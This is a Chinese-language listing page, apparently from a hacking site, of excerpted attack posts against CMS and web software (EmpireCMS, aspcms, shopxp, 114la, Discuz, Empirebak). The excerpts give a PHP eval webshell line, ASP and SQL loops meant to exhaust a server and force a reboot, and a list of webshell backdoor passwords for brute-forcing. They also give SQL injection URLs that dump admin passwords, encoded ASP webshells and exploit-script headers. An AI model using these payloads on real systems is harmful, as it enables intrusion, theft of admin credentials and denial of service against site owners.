EmpireCMS(帝国)后台拿shell
管理模板 添加自定义页面 <\?php eval($_POST[baidu])?\> <%这个被过滤了所以必须这样写。 作者:killer 还是几个月前一个朋友让我看看帝国进后台能不能找到简单点拿shell的方法,因为他找的方法虽然达到目的了,但是过程很繁琐. 方法很简单,直接上传webshell.. 进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直...
WEBSHELL重启服务器的方法?
把下面代码保存成webshell.asp,然后访问。CPU暴。管理员重启。 <% for i = 1 to 100 i = 10 next %> DB-OWNER权限下让服务器重启 SQL命令:wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd– 收集一下。会有用的哦!!
国内各类 WebShell 密码大全 爆破、社工用 webshell-password
国内各类 WebShell 后门密码大全,已剔除重复: 名称 密码 6.0 VIP(防破解版 12345 - yanghai或者168888 (中国数据) rinima . tg [D.s.T]会员专用WebShell darkst [HxHacK]华夏黑客联盟 192298273208298273192298273185298273187298273195298273 [华夏黑客小豪]Shell...
iis7重大漏洞 自动批量生产webshell!~
Automatic iis7 parsing vulnerability exploit 我就不在多说什么了! 直接上图: 下载:Automatic iis7.0 exploit
114啦注入0day批量
<?php $sbcopyright=' ---------------------------------------- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2011.04.02 Usage: php '.$argv[0].' host /path Example: php '.$argv[0].' ...
aspcms建站系统注入0day
aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且 支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。 漏洞文件:/plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转,所以要快,建议用快捷键复制 爆用户名EXP: https://www.webshell.cc/plug/productbuy.asp?id=2...
shopxp网上购物系统v7.4爆密码0day
版 本:shopxp网上购物系统 v7.4 关键词:inurl:shopxp_news.asp 后 台:shopxp_admin 暴密码的语句: /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin ...
7个ASP小马合集~!
1号小马 <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>Cx~</title> <%@ LANGUAGE = VBScript.Encode %> <%#@~^CgAAAA==[b:~K4N0/K3QMAAA==^#~@%> <...
Discuz 1.5 配合NGINX二次解析爆路径BUG
作者:晴天小铸 测试环境:discuz X1.5+nginx 1.0 漏洞文件source/function/function_core.php,代码: $_G['setting']['domain']['app']['default'] && $content = preg_replace("/ 利用代码: https://www.webshell.cc/forum.php/adm...
帝国备份王(Empirebak)拿webshell
帝国备份王(Empirebak)简介 EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库. 可在 http://www.phome.net/ebak2008os/ 下载到 默认账号密码为 admin 123456 登陆后先备份一次数据 备份时可选择备份到的目录。。默认有个safemod 当然也可以是别的..这里以s...